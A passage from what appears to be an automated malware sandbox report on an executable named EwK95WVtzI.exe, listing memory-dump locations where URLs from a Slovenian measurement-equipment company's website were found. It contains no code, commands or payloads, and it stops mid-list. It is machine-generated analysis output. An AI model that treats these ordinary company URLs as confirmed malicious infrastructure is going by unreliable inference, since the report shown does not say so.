00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/splosni-prodajni-pogoji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/piskotki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpora/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/analiza-plinov/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/ex/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/kalibracija/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/monitoring/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/nivo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/prenosno/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/regulacija/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperatura/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/tlak/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/vlaga/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/privacy-policy/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/total-cost-of-ownership-elpro-lepenik-co-d-o-o/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/vrtanje-v-cas-zastojev-z-robustnimi-tablicami-algiz/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, 